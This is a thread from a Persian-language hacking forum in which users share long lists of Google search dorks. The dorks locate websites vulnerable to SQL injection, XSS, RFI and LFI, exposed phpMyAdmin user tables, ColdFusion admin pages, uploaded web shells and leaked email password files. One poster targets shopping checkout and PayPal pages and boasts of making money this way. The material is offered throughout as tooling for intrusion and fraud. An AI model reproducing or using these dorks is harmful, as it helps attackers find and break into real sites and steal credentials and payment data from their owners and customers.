inurl:union+select+filetype:asp
inurl:union+select+filetype:php
inurl:union+select+filetype:cfm

inurl:union 4.1.22-standard-log
inurl:union 5.0.67-log
inurl:union» 4.1.22-log
inurl:union 5.0.32
inurl:union» 5.0.67
inurl:union» 5.0.51a-3ubuntu5
inurl:union» 5.1.63-cll
inurl:bootstrap.php

Milad.BlackHat
01-24-2014, 01:29 PM
SQL 2014 DORK SQL DORK 2014


trainers.php?id=
play_old.php?id=
declaration_more.php?decl_id=
Pageid=
games.php?id=
newsDetail.php?id=
staff_id=
historialeer.php?num=
product-item.php?id=
news_view.php?id=
humor.php?id=
communique_detail.php?id=
sem.php3?id=
opinions.php?id=
spr.php?id=
pages.php?id=
chappies.php?id=
prod_detail.php?id=
viewphoto.php?id=
view.php?id=
website.php?id=
hosting_info.php?id=
gery.php?id=
detail.php?ID=
publications.php?id=
Productinfo.php?id=
releases.php?id=
ray.php?id=
produit.php?id=
pop.php?id=
shopping.php?id=
productdetail.php?id=
post.php?id=
section.php?id=
theme.php?id=
page.php?id=
shredder-categories.php?id=
product_ranges_view.php?ID=
shop_category.php?id=
channel_id=
newsid=
news_display.php?getid=
ages.php?id=
clanek.php4?id=
review.php?id=
iniziativa.php?in=
curriculum.php?id=
labels.php?id=
look.php?ID=
galeri_info.php?l=
tekst.php?idt=
newscat.php?id=
newsticker_info.php?idn=
rubrika.php?idr=
offer.php?idf=
“id=” & intext:”Warning: mysql_fetch_array()
“id=” & intext:”Warning: getimagesize()
“id=” & intext:”Warning: session_start()
“id=” & intext:”Warning: mysql_num_rows()
“id=” & intext:”Warning: mysql_query()
“id=” & intext:”Warning: array_merge()
“id=” & intext:”Warning: preg_match()
“id=” & intext:”Warning: ilesize()
“id=” & intext:”Warning: filesize()
index.php?id=
buy.php?category=
article.php?ID=
play_old.php?id=
newsitem.php?num=
top10.php?cat=
historialeer.php?num=
reagir.php?num=
Stray-Questions-View.php?num=
forum_bds.php?num=
game.php?id=
view_product.php?id=
sw_comment.php?id=
news.php?id=
avd_start.php?avd=
event.php?id=
sql.php?id=
news_view.php?id=
select_biblio.php?id=
humor.php?id=
ogl_inet.php?ogl_id=
fiche_spectacle.php?id=
communique_detail.php?id=
sem.php3?id=
kategorie.php4?id=
faq2.php?id=
show_an.php?id=
preview.php?id=
loadpsb.php?id=
opinions.php?id=
spr.php?id=
announce.php?id=
participant.php?id=
download.php?id=
main.php?id=
review.php?id=
chappies.php?id=
read.php?id=
prod_detail.php?id=
article.php?id=
person.php?id=
productinfo.php?id=
showimg.php?id=
view.php?id=
website.php?id=
hosting_info.php?id=
gery.php?id=
rub.php?idr=
view_faq.php?id=
artikelinfo.php?id=
detail.php?ID=
index.php?=
profile_view.php?id=
category.php?id=
publications.php?id=
fellows.php?id=
downloads_info.php?id=
prod_info.php?id=
shop.php?do=part&id=
collectionitem.php?id=
band_info.php?id=
product.php?id=
releases.php?id=
ray.php?id=
produit.php?id=
pop.php?id=
shopping.php?id=
productdetail.php?id=
post.php?id=
viewshowdetail.php?id=
clubpage.php?id=
memberInfo.php?id=
section.php?id=
theme.php?id=
page.php?id=
shredder-categories.php?id=
tradeCategory.php?id=
product_ranges_view.php?ID=
shop_category.php?id=
transcript.php?id=
channel_id=
item_id=
newsid=
trainers.php?id=
news-full.php?id=
news_display.php?getid=
index2.php?option=
readnews.php?id=
newsone.php?id=
product-item.php?id=
pages.php?id=
clanek.php4?id=
viewapp.php?id=
viewphoto.php?id=
galeri_info.php?l=
iniziativa.php?in=
curriculum.php?id=
labels.php?id=
story.php?id=
look.php?ID=
aboutbook.php?id=
“id=” & intext:”Warning: mysql_fetch_assoc()
“id=” & intext:”Warning: is_writable()
“id=” & intext:”Warning: Unknown()
“id=” & intext:”Warning: mysql_result()
“id=” & intext:”Warning: pg_exec()
“id=” & intext:”Warning: require()
buy.php?category=
pageid=
page.php?file=
show.php?id=
newsitem.php?num=
readnews.php?id=
top10.php?cat=
reagir.php?num=
Stray-Questions-View.php?num=
forum_bds.php?num=
game.php?id=
view_product.php?id=

Milad.BlackHat
01-30-2014, 01:54 PM
Private Dorks SQL


inurl:group_concat username 0x3a PASSWORD from robot
inurl:group_concat username 0x3a PASSWORD from pirates
inurl:group_concat username 0x3a PASSWORD from obama
inurl:group_concat username 0x3a PASSWORD from shadow
inurl:group_concat username 0x3a PASSWORD from khan
inurl:group_concat username 0x3a PASSWORD from paul
inurl:group_concat username 0x3a PASSWORD from pakistan
inurl:group_concat username 0x3a PASSWORD from hacker

inurl:group_concat username 0x3a PASSWORD from users
inurl:group_concat username 0x3a PASSWORD from adm
inurl:group_concat username 0x3a PASSWORD from admin
inurl:group_concat username 0x3a PASSWORD from user
inurl:concat username 0x3a password from sysibm.sysdummy1
inurl:concat username 0x3a password from israel
inurl:concat username 0x3a password from mr.bean
inurl:concat username 0x3a password from sysuser
inurl:concat username 0x3a password from sysadmin
inurl:/MyBB/Upload/inc/
inurl:db_mysql.php
inurl:sql.php?table=wp_users
inurl:sql.php?table=group
inurl:sql.php?table=phpMyAdmin
inurl:sql.php?table=users
inurl:sql.php?table=login
inurl:/phpMyAdmin/sql.php
inurl:sql.php?table=customer
inurl:sql.php?table=member
inurl:sql.php?table=account
inurl:sql.php?table=admin
inurl:sql.php?table=tblwhoislog
inurl:/usr/local/apache/htdocs
inurl:sql.php?table=jos_users
inurl:sql.php?table=mybb_users
inurl:sql.php?table=log
inurl:sql.php?table=pass
inurl:sql.php?table=information_schema
inurl:sql.php?table=proxies_priv
inurl:sql.php?table=mysql.user
inurl:sql.php?table=collection
inurl:sql.php?table=loginlog
inurl:sql.php?table=menu
inurl:sql.php?table=setting
inurl:sql.php?table=phpbb_users
inurl:/phpmyadmin/sql.php?db=mysql&sql_query=
inurl:union+select+filetype:asp
inurl:union+select+filetype:php
inurl:union+select+filetype:cfm

inurl:union 4.1.22-standard-log
inurl:union 5.0.67-log
inurl:union» 4.1.22-log
inurl:union 5.0.32
inurl:union» 5.0.67
inurl:union» 5.0.51a-3ubuntu5
inurl:union» 5.1.63-cll
inurl:bootstrap.php

Milad.BlackHat
01-30-2014, 01:58 PM
1200+ SQLi Dorks

Milad.BlackHat
02-01-2014, 02:15 PM
XSS Dork


inurl:com_feedpostold/feedpost.php?url=

inurl:/products/orkutclone/scrapbook.php?id=

inurl:/products/classified/headersearch.php?sid=

inurl:/poll/default.asp?catid=

inurl:/search_results.php?search=Search&k=

inurl:/preaspjobboard//Employee/emp_login.asp?msg1=

inurl:/pages/match_report.php?mid= pages/match_report.php?mid=

inurl:/notice.php?msg= /notice.php?msg=

inurl:/gen_confirm.php?errmsg= /gen_confirm.php?errmsg=

inurl:/ndex.php?option=com_easygb&Itemid=

inurl:/2wayvideochat/index.php?r=

inurl:/view.php?PID= /view.php?PID=

inurl:/Property-Cpanel.html?pid= /Property-Cpanel.html?pid=

inurl:/showproperty.php?id= /showproperty.php?id=

inurl:/vehicle/buy_do_search/?order_direction=

inurl:/elms/subscribe.php?course_id= /elms/subscribe.php?course_id=

inurl:/winners.php?year=2008&type= /winners.php?year=2008&type=

inurl:/schoolmv2/html/studentmain.php?session=

inurl:/site_search.php?sfunction= /site_search.php?sfunction=

inurl:/search.php?search_keywords= /search.php?search_keywords=

inurl:/hexjector.php?site= /hexjector.php?site=

inurl:/news.php?id= /news.php?id=

inurl:/ndex.php?view=help&faq=1&ref=

inurl:"contentPage.php?id="

inurl:"displayResource.php?id="

intext:"Website by Mile High Creative"

inurl:/index.php?option=com_reservations&task=askope&nids er=2&namser= "com_reservations"

inurl:/info.asp?page=fullstory&key=1&news_type=news&onvan =

inurl:/ser/parohija.php?id= /ser/parohija.php?id=

inurl:/strane/pas.php?id= /strane/pas.php?id=

inurl:/main.php?sid= /main.php?sid=

amsvampire
02-27-2014, 10:02 AM
آقا سلام و خسته نباشید
ما تازه کاریم در برار استادان
اما ما هم پیشرفت خواهیم کرد
این مجموعه از دورک های انجمن هست که همگی گذاشتین
ما هم گفتیم بیاییم همه را یک جا کنیم
این فایل فشرده 138 کیلوبایته و وقتی باز بشه با فرمت TXT حجمش 650 کیلوبایت میشه
از همگی دوستان هم متشکریم
ما که کاری نکردیم و فقط جمع اوری و گرداوری در نتیجه توضیع
این ورژن یک هست
باز هم در نسخه های بعد به ان اضافه می کنم.
با تشکر
تشکر یادتون نره اگه دوست داشتی.

[Only registered and activated users can see links] ([Only registered and activated users can see links])

tarkan2013
03-04-2014, 02:39 PM
سلام
کسی دورک واسه حمله rfi سراغ داره؟

pixcel
03-20-2014, 11:45 PM
سلام دورک RFI

12 تا Notpad هستش ک داخلشون ی عالمه دورک RFI هستش
:21:

[Only registered and activated users can see links]

دکمه تشکر هم همین پایینه:71::64:

M@HDI_KING
04-04-2014, 04:33 PM
اینم یه سری dork جدید:
SQL-I

M@HDI_KING
04-04-2014, 05:01 PM
مجموعه 5000 دورک:

M@HDI_KING
04-04-2014, 05:13 PM
اینم جدیدترین دورک های asp...

ixpro
04-04-2014, 05:55 PM
خدمت دوستان گرامی و طرفداران sql :51:

general.php?doshow=
padrao.php?abre=
index2.php?section=
enter.php?seite=
general.php?my=
down*.php?lang=
head.php?loader=
main.php?xlink=
general.php?goto=
include.php?dir=
index3.php?base_dir=
gallery.php?redirect=
layout.php?basepath=
start.php?header=
pagina.php?modo=
blank.php?in=
base.php?name=
index.php?adresa=
down*.php?u=
nota.php?goFile=
main.php?mod=
file.php?start=
view.php?redirect=
index2.php?u=
head.php?base_dir=
mod*.php?recipe=
press.php?pr=
padrao.php?* *=
info.php?ev=
layout.php?opcion=
index1.php?nivel=
include.php?seccion=
print.php?rub=
view.php?lang=
index.php?pr=
mod*.php?include=
general.php?seite=
pagina.php?numero=
mod*.php?seccion=
principal.php?pollname=
include.php?read=
*inc*.php?pg=
press.php?rub=
index2.php?incl=
pagina.php?chapter=
view.php?middle=
print.php?sekce=
nota.php?ru
default.php?index=
sub*.php?menue=

M@HDI_KING
04-05-2014, 05:36 PM
دورک asp خدمت شما.....

H_SQLI.EMpiRe
04-09-2014, 01:33 AM
Give me money BaCk ...




خوشمزه ...


inurl:".php?cat="+intext:"Paypal"+site:UK
inurl:".php?cat="+intext:"/Buy Now/"+site:.net
inurl:".php?cid="+intext:"online+betting"
inurl:".php?id=" intext:"View cart"
inurl:".php?id=" intext:"Buy Now"
inurl:".php?id=" intext:"add to cart"
inurl:".php?id=" intext:"shopping"
inurl:".php?id=" intext:"boutique"
inurl:".php?id=" intext:"/store/"
inurl:".php?id=" intext:"/shop/"
inurl:".php?id=" intext:"toys"
inurl:".php?cid="









Go0D LuCk --> Not Acceptable 404

H_SQLI.EMpiRe
04-09-2014, 01:52 AM
Cold Fution Dork...





filetype:cfm "cfapplication name" password

inurl:login.cfm

intitle:"Error Occured" "The error occurred in" filetype:cfm

intitle:"ColdFusion Administrator Login"

intitle:"index of" cfide

H_SQLI.EMpiRe
04-09-2014, 02:48 AM
با این دورک ها کم پول در نیومده ...

ما که دلمون نمیاد ...


dorks CC $ paypal
checkout.asp?UserID=
checkout.asp?cartid=
checkout.cfm?UserID=
checkout.cfm?cartid=
checkout.php?UserID=
checkout.php?cartid=
checkout1.asp?cartid=
checkout1.cfm?cartid=
checkout1.php?cartid=
checkout_confirmed.asp?order_id=
checkout_confirmed.cfm?order_id=
checkout_confirmed.php?order_id=
db/CART/product_details.asp?product_id=
db/CART/product_details.php?product_id=
eshop.php?id=
estore/products.php?cat=
garden_equipment/Fruit-Cage/product.asp?pr=
garden_equipment/Fruit-Cage/product.php?pr=
garden_equipment/pest-weed-control/product.asp?pr=
garden_equipment/pest-weed-control/product.php?pr=
getbook.asp?bookid=
getbook.cfm?bookid=
getbook.php?bookid=
giftDetail.asp?id=
giftDetail.cfm?id=
giftDetail.php?id=
giftshop/product.php?proid=
global/product/product.asp?gubun=
global/product/product.php?gubun=
goods_detail.asp?data=
goods_detail.php?data=
goods_detail.php?goodsIdx=
inurl: prod_detail.php?id=
inurl: prod_detail.php?id=
inurl: prod_info.php?id=
inurl: prod_info.php?id=
inurl: product-item.php?id=
inurl: product-item.php?id=
inurl: product.php?id=
inurl: product.php?id=
inurl: product_ranges_view.php?ID=
inurl: product_ranges_view.php?id=
inurl: productdetail.php?id=
inurl: productdetail.php?id=
inurl: productinfo.php?id=
inurl: productinfo.php?id=
inurl: produit.php?id=
inurl: produit.php?id=
inurl:shop.php?do=part&id=
inurl:shop.php?do=part&id=
inurl:shop_category.php?id=
inurl:shopping.php?id=
inurl:shopping.php?id=
inurl:view_product.php?id=
inurl:view_product.php?id=
irbeautina/product_detail.asp?product_id=
irbeautina/product_detail.php?product_id=
item.asp?eid=
item.asp?id=
item.asp?iid=
item.asp?item_id=
item.asp?itemid=
item.asp?model=
item.asp?prodtype=
item.asp?shopcd=
item.asp?sub_id=
item.cfm?eid=
item.cfm?item_id=
item.cfm?itemid=
item.cfm?model=
item.cfm?prodtype=
item.cfm?shopcd=
item.php?SKU=
item.php?cat=
item.php?code=
item.php?eid=
item.php?id=
item.php?iid=
item.php?item=
item.php?item_id=
item.php?itemid=
item.php?model=
item.php?prodtype=
item.php?shopcd=
item.php?sub_id=
item/detail.php?num=
item/wpa-storefront-the-ultimate-wpecommerce-theme/discussion/61891?page=
itemDesc.asp?CartId=
itemDesc.cfm?CartId=
itemDesc.php?CartId=
item_book.asp?CAT=
item_book.php?CAT=
item_details.asp?catid=
item_details.cfm?catid=
item_details.php?catid=
item_id=
item_list.asp?cat_id=
item_list.asp?maingroup
item_list.cfm?maingroup
item_list.php?cat_id=
item_list.php?maingroup
item_show.asp?code_no=
item_show.asp?id=
item_show.asp?lid=
item_show.cfm?code_no=
item_show.php?code_no=
item_show.php?id=
item_show.php?itemID=
item_show.php?lid=
itemdetail.asp?item=
itemdetail.cfm?item=
itemdetail.php?item=
itemdetails.asp?catalogid=
itemdetails.cfm?catalogid=
itemdetails.php?catalogid=
itemlist.php?categoryID=
kr/product/product.php?gubun=
kshop/home.php?cat=
kshop/product.asp?productid=
kshop/product.php?productid=
order-now.php?prodid=
order.asp?BookID=
order.asp?id=
order.asp?item_ID=
order.asp?lotid=
order.cfm?BookID=
order.cfm?id=
order.cfm?item_ID=
order.php?BookID=
order.php?id=
order.php?item_ID=
order.php?l= order.php?l=
order.php?lang= order.php?lang=
order.php?list= order.php?list=
order.php?ln= order.php?ln=
order.php?p= order.php?p=
order.php?pag= order.php?pag=
order.php?page= order.php?page=
order.php?pg= order.php?pg=
order.php?wp= .php?wp=
order.php?wp= order.php?wp=
order/cart/index.php?maincat_id=
prod.asp?cat=
prod.php?cat=
prod.php?prod= .php?prod="
prodView.asp?idProduct=
prodView.cfm?idProduct=
prodView.php?idProduct=
prod_detail.php?id=
prod_details.php?id=
prod_details.php?products_id=
prod_indiv.php?groupid=
prod_info.php?id=
prod_show.asp?id=
prod_show.asp?prodid=
prodbycat.asp?intCatalogID=
prodbycat.cfm?intCatalogID=
prodbycat.php?intCatalogID=
proddetail.php?prod=
proddetail.php?prod= .php?prod="
proddetails_print.php?prodid=
prodetails.asp?prodid=
prodetails.cfm?prodid=
prodetails.php?prodid=
prodlist.asp?catid=
prodlist.cfm?catid=
prodlist.php?catid=
prodotti.asp?id_cat=
prodotti.php?id_cat=
prodrev.php?cat=
product-detail.php?prodid=
product-details.php?prodID=
product-info.php?cat=
product-item.php?id=
product-list.asp?category_id=
product-list.asp?cid=
product-list.asp?id=
product-list.php?category_id=
product-list.php?cid=
product-list.php?id=
product-range.asp?rangeID=
product-range.php?rangeID=
product.asp?****=



بقیش پیوست شد :

M@HDI_KING
04-10-2014, 11:16 PM
دورک برای پیدا کردن شلر c99

M@HDI_KING
04-10-2014, 11:28 PM
اینم یه سری گلچین از باگ های SqlوLfiوRfiوXSSو...

NEX.LINUX
04-11-2014, 01:01 AM
سلام من یه چند تا دورک برای باگ sql نیاز دارم لطفا از دورک هایی که تایید شون می کنید بدید


منمون کوچیک شما amir

M@HDI_KING
04-12-2014, 12:51 AM
اینم یه مجموعه دورک Rfi خدمت دوستان...

M@HDI_KING
04-12-2014, 03:50 PM
دورک های xss جدید ....
خدمت دوستان ضمیمه شد.

M@HDI_KING
04-13-2014, 11:49 PM
inurltray-Questions-View. php? num=
inurl:forum_bds. php? num=
inurl:game. php? id=
inurl:view_product. php? id=
inurl:newsone. php? id=
inurl:sw_comment. php? id=
inurl:news. php? id=
inurl:avd_start. php? avd=
inurl:event. php? id=
inurlroduct-item. php? id=
inurl:sql. php? id=
inurl:news_view. php? id=
inurl:select_biblio. php? id=
inurl:humor. php? id=
inurl:aboutbook. php? id=
inurl:fiche_spectacle. php? id=
inurl:communique_detail. php? id=
inurl:sem. php3? id=
inurl:kategorie. php4? id=
inurl:news. php? id=
inurl:index. php? id=
inurl:faq2. php? id=
inurl:show_an. php? id=
inurlreview. php? id=
inurl:loadpsb. php? id=
inurlpinions. php? id=
inurl:spr. php? id=
inurlages. php? id=
inurl:announce. php? id=
inurl:clanek. php4? id=
inurlarticipant. php? id=
inurl:download. php? id=
inurl:main. php? id=
inurl:review. php? id=
inurl:chappies. php? id=
inurl:read. php? id=
inurlrod_detail. php? id=
inurl:viewphoto. php? id=
inurl:article. php? id=
inurlerson. php? id=
inurlroductinfo. php? id=
inurl:showimg. php? id=
inurl:view. php? id=
inurl:website. php? id=
inurl:hosting_info. php? id=
inurl:gallery. php? id=
inurl:rub. php? idr=
inurl:view_faq. php? id=
inurl:artikelinfo. php? id=
inurl:detail. php? ID=
inurl:index. php?=
inurlrofile_view. php? id=
inurl:category. php? id=
inurlublications. php? id=
inurl:fellows. php? id=
inurl:downloads_info. php? id=
inurlrod_info. php? id=
inurl:shop. php? do=part&id=
inurlroductinfo. php? id=
inurl:collectionitem. php? id=
inurl:band_info. php? id=
inurlroduct. php? id=
inurl:releases. php? id=
inurl:ray. php? id=
inurlroduit. php? id=
inurlop. php? id=
inurl:shopping. php? id=
inurlroductdetail. php? id=
inurlost. php? id=
inurl:viewshowdetail. php? id=
inurl:clubpage. php? id=
inurl:memberInfo. php? id=
inurl:section. php? id=
inurl:theme. php? id=
inurlage. php? id=
inurl:shredder-categories. php? id=
inurl:tradeCategory. php? id=
inurlroduct_ranges_view. php? ID=
inurl:shop_category. php? id=
inurl:tran******. php? id=
inurl:channel_id=
inurl:item_id=
inurl:newsid=
inurl:trainers. php? id=
inurl:news-full. php? id=
inurl:news_display. php? getid=
inurl:index2. php? option=
inurl:readnews. php? id=
inurl:top10. php? cat=
inurl:newsone. php? id=
inurl:event. php? id=
inurlroduct-item. php? id=
inurl:sql. php? id=
inurl:aboutbook. php? id=
inurl:review. php? id=
inurl:loadpsb. php? id=
inurl:ages. php? id=
inurl:material. php? id=
inurl:clanek. php4? id=
inurl:announce. php? id=
inurl:chappies. php? id=
inurl:read. php? id=
inurl:viewapp. php? id=
inurl:viewphoto. php? id=
inurl:rub. php? idr=
inurl:galeri_info. php? l=
inurl:review. php? id=
inurl:iniziativa. php? in=
inurl:curriculum. php? id=
inurl:labels. php? id=
inurl:story. php? id=
inurl:look. php? ID=
inurl:newsone. php? id=
inurl:aboutbook. php? id=
inurl:material. php? id=
inurlpinions. php? id=
inurl:announce. php? id=
inurl:rub. php? idr=
inurl:galeri_info. php? l=
inurl:tekst. php? idt=
inurl:newscat. php? id=
inurl:newsticker_info. php? idn=
inurl:rubrika. php? idr=
inurl:rubp. php? idr=
inurlffer. php? idf=
inurl:art. php? idm=
inurl:title. php? id=
inurl:index. php? id=
inurl:trainers. php? id=
inurl:buy. php? category=
inurl:article. php? ID=
inurllay_old. php? id=
inurl:declaration_more. php? decl_id=
inurlageid=
inurl:games. php? id=
inurlage. php? file=
inurl:newsDetail. php? id=
inurl:gallery. php? id=
inurl:article. php? id=
inurl:show. php? id=
inurl:staff_id=
inurl:newsitem. php? num=
inurl:readnews. php? id=
inurl:top10. php? cat=
inurl:historialeer. php? num=
inurl:reagir. php? num=
inurltray-Questions-View. php? num=
inurl:forum_bds. php? num=
inurl:game. php? id=
inurl:view_product. php? id=
inurl:newsone. php? id=
inurl:sw_comment. php? id=
inurl:news. php? id=
inurl:avd_start. php? avd=
inurl:event. php? id=
inurlroduct-item. php? id=
inurl:sql. php? id=
inurl:news_view. php? id=
inurl:select_biblio. php? id=
inurl:humor. php? id=
inurl:aboutbook. php? id=
inurl:fiche_spectacle. php? id=
inurl:communique_detail. php? id=
inurl:sem. php3? id=
inurl:kategorie. php4? id=
inurl:news. php? id=
inurl:index. php? id=
inurl:faq2. php? id=
inurl:show_an. php? id=
inurlreview. php? id=
inurl:loadpsb. php? id=
inurlpinions. php? id=
inurl:spr. php? id=
inurlages. php? id=
inurl:announce. php? id=
inurl:clanek. php4? id=
inurlarticipant. php? id=
inurl:download. php? id=
inurl:main. php? id=
inurl:review. php? id=
inurl:chappies. php? id=
inurl:read. php? id=
inurlrod_detail. php? id=
inurl:viewphoto. php? id=
inurl:article. php? id=
inurlerson. php? id=
inurlroductinfo. php? id=
inurl:showimg. php? id=
inurl:view. php? id=
inurl:website. php? id=
inurl:hosting_info. php? id=
inurl:gallery. php? id=
inurl:rub. php? idr=
inurl:view_faq. php? id=
inurl:artikelinfo. php? id=
inurl:detail. php? ID=
inurl:index. php?=
inurlrofile_view. php? id=
inurl:category. php? id=
inurlublications. php? id=
inurl:fellows. php? id=
inurl:downloads_info. php? id=
inurlrod_info. php? id=
inurl:shop. php? do=part&id=
inurlroductinfo. php? id=
inurl:collectionitem. php? id=
inurl:band_info. php? id=
inurlroduct. php? id=
inurl:releases. php? id=
inurl:ray. php? id=
inurlroduit. php? id=
inurlop. php? id=
inurl:shopping. php? id=
inurlroductdetail. php? id=
inurlost. php? id=
inurl:viewshowdetail. php? id=
inurl:clubpage. php? id=
inurl:memberInfo. php? id=
inurl:section. php? id=
inurl:theme. php? id=
inurlage. php? id=
inurl:shredder-categories. php? id=
inurl:tradeCategory. php? id=
inurlroduct_ranges_view. php? ID=
inurl:shop_category. php? id=
inurl:tran******. php? id=
inurl:channel_id=
inurl:item_id=
inurl:newsid=
inurl:trainers. php? id=
inurl:news-full. php? id=
inurl:news_display. php? getid=
inurl:index2. php? option=
inurl:readnews. php? id=
inurl:top10. php? cat=
inurl:newsone. php? id=
inurl:event. php? id=
inurlroduct-item. php? id=
inurl:sql. php? id=
inurl:aboutbook. php? id=
inurl:review. php? id=
inurl:loadpsb. php? id=
inurl:ages. php? id=
inurl:material. php? id=
inurl:clanek. php4? id=
inurl:announce. php? id=
inurl:chappies. php? id=
inurl:read. php? id=
inurl:viewapp. php? id=
inurl:viewphoto. php? id=

M@HDI_KING
04-14-2014, 12:02 AM
inurl:group_concat username 0x3a PASSWORD from robot
inurl:group_concat username 0x3a PASSWORD from pirates
inurl:group_concat username 0x3a PASSWORD from obama
inurl:group_concat username 0x3a PASSWORD from shadow
inurl:group_concat username 0x3a PASSWORD from khan
inurl:group_concat username 0x3a PASSWORD from paul
inurl:group_concat username 0x3a PASSWORD from pakistan
inurl:group_concat username 0x3a PASSWORD from hacker

inurl:group_concat username 0x3a PASSWORD from users
inurl:group_concat username 0x3a PASSWORD from adm
inurl:group_concat username 0x3a PASSWORD from admin
inurl:group_concat username 0x3a PASSWORD from user
inurl:concat username 0x3a password from sysibm.sysdummy1
inurl:concat username 0x3a password from israel
inurl:concat username 0x3a password from mr.bean
inurl:concat username 0x3a password from sysuser
inurl:concat username 0x3a password from sysadmin
inurl:/MyBB/Upload/inc/
inurl:db_mysql.php
inurl:sql.php?table=wp_users
inurl:sql.php?table=group
inurl:sql.php?table=phpMyAdmin
inurl:sql.php?table=users
inurl:sql.php?table=login
inurl:/phpMyAdmin/sql.php
inurl:sql.php?table=customer
inurl:sql.php?table=member
inurl:sql.php?table=account
inurl:sql.php?table=admin
inurl:sql.php?table=tblwhoislog
inurl:/usr/local/apache/htdocs
inurl:sql.php?table=jos_users
inurl:sql.php?table=mybb_users
inurl:sql.php?table=log
inurl:sql.php?table=pass
inurl:sql.php?table=information_schema
inurl:sql.php?table=proxies_priv
inurl:sql.php?table=mysql.user
inurl:sql.php?table=collection
inurl:sql.php?table=loginlog
inurl:sql.php?table=menu
inurl:sql.php?table=setting
inurl:sql.php?table=phpbb_users
inurl:/phpmyadmin/sql.php?db=mysql&sql_query=
inurl:union+select+filetype:asp
inurl:union+select+filetype:php
inurl:union+select+filetype:cfm

inurl:union 4.1.22-standard-log
inurl:union 5.0.67-log
inurl:union» 4.1.22-log
inurl:union 5.0.32
inurl:union» 5.0.67
inurl:union» 5.0.51a-3ubuntu5
inurl:union» 5.1.63-cll
inurl:bootstrap.php

M@HDI_KING
04-14-2014, 12:03 AM
intitle:"index.of" intext:"(Win32) DAV/2" intext:"Apache"
intitle:"index.of" intext:"(Win32) DAV/2" intext:"Apache" site:edu
intitle:"index.of" intext:"(Win32) DAV/2" intext:"Apache" site:gov
intitle:"index.of" intext:"(Win32) DAV/2" intext:"Apache" site:YOURCOUNTRY

intitle:"index.of" intext:"(Win32) DAV/2" intext:"Apache"

or

intitle:"index.of" intext:"(Win32) DAV/2" intext:"Apache" site:edu

or intitle:"index.of" intext:"(Win32) DAV/2" intext:"Apache" site:gov

or intitle:"index.of" intext:"(Win32) DAV/2" intext:"Apache" site:YOURCOUNTRY[/LEFT]

intitle:"Directory Listing For /" + inurl:webdav tomcat
intitle:"Directory Listing For /" + inurl:webdav

intitle:"Directory Listing For /" + inurl:webdav tomcat

intitle:"Directory Listing For /" + inurl:webdav



inurl:*.edu/*.asp

inurl:.gov.*/*.asp

inurl:*.gov/*.asp

inurl:.org/*.asp

inurl:.ag/*.asp

inurl:.it/*.asp

inurl:.uk/*.asp

inurl:.co.il/*.asp

inurl:.com/*.asp

inurl:.co.id/*.asp

inurl:.ah.cn/*.asp

inurl:.bj.cn/*.asp

inurl:.cq.cn/*.asp

inurl:.fj.cn/*.asp

inurl:.gd.cn/*.asp

inurl:.gs.cn/*.asp

inurl:.gz.cn/*.asp

inurl:.gx.cn/*.asp

inurl:.ha.cn/*.asp

inurl:.hb.cn/*.asp

inurl:.he.cn/*.asp

inurl:.hi.cn/*.asp

inurl:.hl.cn/*.asp

inurl:.hn.cn/*.asp

inurl:.jl.cn/*.asp

inurl:.js.cn/*.asp

inurl:.jx.cn/*.asp

inurl:.ln.cn/*.asp

inurl:.nm.cn/*.asp

inurl:.nx.cn/*.asp

inurl:.qh.cn/*.asp

inurl:.sc.cn/*.asp

inurl:.sd.cn/*.asp

inurl:.sh.cn/*.asp

inurl:.sn.cn/*.asp

inurl:.sx.cn/*.asp

inurl:.tj.cn/*.asp

inurl:.tw.cn/*.asp

inurl:.xj.cn/*.asp

inurl:.xz.cn/*.asp

inurl:.yn.cn/*.asp

inurl:.zj.cn/*.asp

inurl:.ac.cn/*.asp




title:welcome.to.IIS.4.0

OR

allintitle:Welcome to Windows NT 4.0 Option Pack

IIS 5.0

allintitle:Welcome to Windows 2000 Internet Services

IIS 6.0

allintitle:Welcome to Windows XP Server Internet Services

M@HDI_KING
04-14-2014, 01:50 PM
لیست خیلی بزرگ sql-i....

M@HDI_KING
04-14-2014, 08:15 PM
محموعه دورک های باگ lfi

M@HDI_KING
04-15-2014, 09:37 PM
show_an.php?id=preview.php?id=
loadpsb.php?id=
opinions.php?id=
spr.php?id=
announce.php?id=
participant.php?id=
download.php?id=
main.php?id=
review.php?id=
chappies.php?id=
read.php?id=
prod_detail.php?id=
article.php?id=
person.php?id=
productinfo.php?id=
showimg.php?id=
view.php?id=
website.php?id=
hosting_info.php?id=
gery.php?id=
rub.php?idr=
view_faq.php?id=
artikelinfo.php?id=
detail.php?ID=
index.php?=
profile_view.php?id=
category.php?id=
publications.php?id=
fellows.php?id=
downloads_info.php?id=
prod_info.php?id=
shop.php?do=part&id=
collectionitem.php?id=
band_info.php?id=
product.php?id=
releases.php?id=
ray.php?id=
produit.php?id=
pop.php?id=
shopping.php?id=
productdetail.php?id=
post.php?id=
viewshowdetail.php?id=
clubpage.php?id=
memberInfo.php?id=
section.php?id=
theme.php?id=
page.php?id=
shredder-categories.php?id=
tradeCategory.php?id=
product_ranges_view.php?ID=
shop_category.php?id=
transcript.php?id=
channel_id=
item_id=
newsid=
trainers.php?id=
news-full.php?id=
news_display.php?getid=
index2.php?option=
readnews.php?id=
newsone.php?id=
product-item.php?id=
pages.php?id=
clanek.php4?id=
viewapp.php?id=
viewphoto.php?id=
galeri_info.php?l=
iniziativa.php?in=
curriculum.php?id=
labels.php?id=
story.php?id=
look.php?ID=
aboutbook.php?id=

M@HDI_KING
04-15-2014, 09:39 PM
WordPress Easy Comment Upload Vunerablity:

™SHADOVVS
04-16-2014, 06:32 PM
دورک برای یافتن شل های آپلود شده بر روی اینترنت

با تشکر

لینک دانلود:

™SHADOVVS
04-16-2014, 06:50 PM
دورک برای پیدا کردن پسورد ایمیل و انواع اکانت


Dork:

inurl:"passes" OR inurl:"passwords" OR inurl:"credentials" -search -download -techsupt -git -games -gz -bypass -exe filetype:txt @yahoo.com OR @gmail OR @hotmail OR @rediff


filetype:txt @ymail.com OR @gmail OR @hotmail OR @rediff

M@HDI_KING
04-16-2014, 08:43 PM
مجموعه باگ های lfiوrfi....

M@HDI_KING
04-17-2014, 01:29 PM
مجموعه 13000 دورک برای باگ sql-i....

M@HDI_KING
04-17-2014, 05:14 PM
سری بعدی باگ های xss...

M@HDI_KING
04-18-2014, 10:11 PM
سری جدید باگ های rfi....

M@HDI_KING
04-19-2014, 04:47 PM
مجموعه 2400 دورک برای باگ sql-i:

M@HDI_KING
04-20-2014, 07:36 PM
دورک های lfi:

M@HDI_KING
04-21-2014, 02:11 PM
سری جدید دورک های xss:

saeid z z z
04-21-2014, 05:58 PM
اینم یه سری دورک Asp

